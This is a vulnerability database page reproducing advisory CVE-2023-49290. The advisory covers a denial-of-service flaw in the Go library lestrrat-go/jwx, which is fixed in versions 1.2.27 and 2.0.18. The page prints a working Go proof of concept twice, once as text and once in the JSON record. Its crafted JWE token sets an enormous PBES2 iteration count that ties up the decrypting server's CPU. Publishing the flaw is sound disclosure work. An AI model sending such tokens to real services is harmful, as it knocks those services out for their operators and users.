GHSA-7F9X-GW85-8GRF

Vulnerability from github – Published: 2023-12-05 23:29 – Updated: 2023-12-05 23:29
VLAI?
Summary
lestrrat-go/jwx's malicious parameters in JWE can cause a DOS
Details

Summary

too high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack

Details

The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive. Therefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack

PoC

package main

import (
    "fmt"
    "github.com/lestrrat-go/jwx/v2/jwa"
    "github.com/lestrrat-go/jwx/v2/jwe"
    "github.com/lestrrat-go/jwx/v2/jwk"
)

func main() {
    token := []byte("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA")
    key, err := jwk.FromRaw([]byte(`abcdefg`))
    payload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))
    if err == nil {
        fmt.Println(string(payload))
    }
}

Impact

It's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lestrrat-go/jwx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lestrrat-go/jwx/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-49290"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-05T23:29:26Z",
    "nvd_published_at": "2023-12-05T00:15:09Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\ntoo high p2c parameter in JWE\u0027s alg PBES2-* could lead to a DOS attack\n\n### Details\nThe JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.\nTherefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack\n\n### PoC\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/lestrrat-go/jwx/v2/jwa\"\n\t\"github.com/lestrrat-go/jwx/v2/jwe\"\n\t\"github.com/lestrrat-go/jwx/v2/jwk\"\n)\n\nfunc main() {\n\ttoken := []byte(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA\")\n\tkey, err := jwk.FromRaw([]byte(`abcdefg`))\n\tpayload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))\n\tif err == nil {\n\t\tfmt.Println(string(payload))\n\t}\n}\n\n```\n\n### Impact\nIt\u0027s a kind of Dos attack, the user\u0027s environment could potentially utilize an excessive amount of CPU resources.\n",
  "id": "GHSA-7f9x-gw85-8grf",
  "modified": "2023-12-05T23:29:26Z",
  "published": "2023-12-05T23:29:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49290"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lestrrat-go/jwx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lestrrat-go/jwx\u0027s malicious parameters in JWE can cause a DOS"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.